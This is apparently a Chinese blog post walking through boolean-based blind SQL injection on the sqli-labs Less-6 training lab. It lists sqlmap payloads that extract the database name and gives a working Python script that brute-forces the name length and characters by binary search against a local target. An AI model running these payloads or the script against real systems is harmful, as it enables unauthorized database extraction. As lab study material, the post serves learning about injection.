布尔盲注脚本-sqlilabs-less6

最新推荐文章于 2024-04-22 18:43:41 发布
最新推荐文章于 2024-04-22 18:43:41 发布
阅读量383 收藏 1
点赞数
分类专栏: 学习经历
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40871137/article/details/104136356
版权

 写这个起因是用sqlmap跑完,从日志里看它payload想自己复现一下。

不过sqlmap好像并没有识别数据库名的长度,而是直接从第一位开始判断。也可能它payload混在了前面识别类型的里面我没注意。判断库名的部分payload如下

ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>96#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>112#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>120#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>114#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>115#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>64#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>96#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>112#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>104#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>100#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>102#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>101#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>64#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>96#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>112#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>104#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>100#

大意是将database()转换为char类型,判断是否为空,非空的话就截取第x位。利用大于号判断其ASCII码值的区间来确定最终值。

如果大于,即and条件为真 页面显示正常,会有一行黄字You are in...........

我自己的脚本思路是,先判断数据库名长度,再利用二分法读取库名。哈哈说是复现,跟sqlmap不一样。懒惰,不想翻源码了

import requests
def getlength():
    i=1
    while(i<10):
        url = 'http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and (select length(database()))={} --+'
        url=url.format(i)
        r = requests.get(url)
        if("You are in..........." in r.text):
            return i
        i += 1        

if __name__ == "__main__":
    u = 'http://127.0.0.1/sqli-labs-master/Less-6/?id='
    #chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    payload = '1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),{},1))>{}--+'
    n=getlength()
    databasename=''
    for i in range(1,n+1):
        min_ascii = 65
        max_ascii = 122
        while(abs(max_ascii-min_ascii)>1):
            mid = (max_ascii + min_ascii)//2
            url = u + payload
            url = url.format(i,mid)
            r = requests.get(url)
            if("You are in..........." in r.text):
                min_ascii = mid 
            else:
                max_ascii = mid 
        databasename += chr(max_ascii)
    print(databasename)

 

wuerror
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全】「漏洞原理」(二)SQL 注入漏洞之理论讲解
顶峰
10-11 1197
严正声明:本博文所讨论的技术仅用于研究学习,旨在增强读者的信息安全意识,提高信息安全防护技能,严禁用于非法活动。任何个人、团体、组织不得用于非法目的,违法犯罪必将受到法律的严厉制裁。
其他CTF题目(记录备忘)
技术学习人生
08-30 3692
1、ISG2014 SQLMAP Misc 100 附件文件下载:http://www.2cto.com/uploadfile/2014/1013/20141013055722355.zip 题目给了一个sqlmap数据包,查看发现是通过逐位猜解的方式获得key,语句类似/message.php?id=1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CH
布尔注(ctfhub)_ctf 布尔注脚
最新发布
2401_84010702的博客
04-22 441
布尔注的条件: ?id=1’ and 1=1–+ 真页面true?id=1’ and 1=2–+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数 2. 根据库名长度爆库名 使用substrate()函数逐个猜数据库名 3. 爆数据表数量 使用mysql的查询语句。从1开始试错 4.爆数据表名长度 使用 limit 0,1(第一张表),limit 1,1(第二张表)
Sqlmap入侵日志审计
weixin_50464560的博客
09-15 513
转载至https://blog.csdn.net/qq_45521281/article/details/105876242 例题1.——bugku日志审计 本题要点:sql注、python脚本编写、python正则表达式 先下载压缩包,解压发现里面是一个 access.log 日志文件。 全选后在网上URL解码: 复制回notepad++中 这样看起来就方便多了。(或者全选,插件—>MIME Tools—>URL Decode) 接下来开始分析。 1.测试有没有注入漏洞 这理就
网络对抗课程SQL注入实验
xidianwuyanzu的博客
07-22 761
网络对抗实验二 1. 搭建 mysql 数据库,建立数据库 test,数据表 student,包含 id、name、score 三列。 2、环境:nginx+php-fpm 3、接口程序按老师给的资料里的php文件略微修改一下 根据输入的参数值,拼接SQL查询语句并执行,将查询结果展示。如根据输入的学号展示姓名和分数。(1.php) 手工sql注入:得到全部信息 根据输入的参数值,拼接 SQL 查询语句并执行,展示查询结果是否为空。如输入学号,展示是
写一个布尔注的脚本
weixin_35752645的博客
01-01 486
布尔注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
sqli-labs第八关布尔注脚
weixin_42750666的博客
04-01 777
import requests def get_dbNamelen(url): #猜解数据库名字长度 length=0 while True: dbNameLen_url=url+"?id=1' and length(database())="+str(length)+"--+" #print(dbNameLen_url) ...
结合手工注入编写一个SQL注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sql注入 自学笔记 报错注入 二阶注入 布尔时间注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
布尔注python脚本.zip
12-28
在给定的压缩包文件"布尔注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔注的Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔注原理**...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型注,布尔注,延时型注...
注入攻击日志分析
11-06
一般的注入攻击的日志分析 SQL注入案例回顾 IIS日志系统概述 IIS日志分析工具及方法
sqli-labs实验指导手册
11-17
2. **布尔型注入**(如less-2): - **基于页面反馈**:通过观察页面是否返回特定信息(如" You are in......")来判断注入成功与否。 3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合...
sqlmap payload简单分析(B E T U S)
热门推荐
think_ycx的专栏
05-19 1万+
sqlmap payload简单分析(B E T U S)前言为了让大家看的更清楚,提供本文下载链接吧:下载地址 本文介绍sqlmap在各个场景中的payload格式,简单分析判断的的原理,也是自己学习过程中的记录。在看本文前,建议看一下drops中的其它文章,源码分析,对-v 3 参数显示出来的东西会有比较好的理解。环境 B E T U : php+mysql (dvwa) S : asp +
sqlmap帮助文档(配合实践翻译)
giantbranch的专栏
09-23 5091
本文链接:http://blog.csdn.net/u012763794/article/details/52638931 用过sqlmap,也用过不少功能了,为了更加了解这个工具,决定翻译一下,利用自己的实战经验去翻译 翻译确实有点辛苦,有些选项还实践不了,但是收获还是很多的 不惜感叹:sqlmap真强大啊~~~~~~~~ _
布尔注(ctfhub)
2401_82985722的博客
03-27 977
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
sql注入之布尔注-脚本
星空下de青铜
05-05 2931
sql注入之布尔注-脚本 先给大家普及一下 在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。 information_schema数据库常用表说明: SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的 TABLES表:提供了关于数据...
sqli-labs通关全解---关于注脚本的编写--less7-10-4
cyynid的博客
01-10 584
【Python】面向Sqli-Labs Less15的布尔注二分法脚本
RexHa的博客
11-18 1725
python实现sqli-labs第15关post注的二分法注入脚本(基于布尔注)
利用布尔注入:SQLi-Labs less16实战脚本
本文档详细介绍了如何结合手工注入的方法编写一个针对SQL注的脚本,以SQLi-Labs的Less16环境为例。首先,作者通过抓包技术来分析测试注入点,观察响应数据包的变化,利用"1')or1=1--#"这种经典的布尔型SQL注入手法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值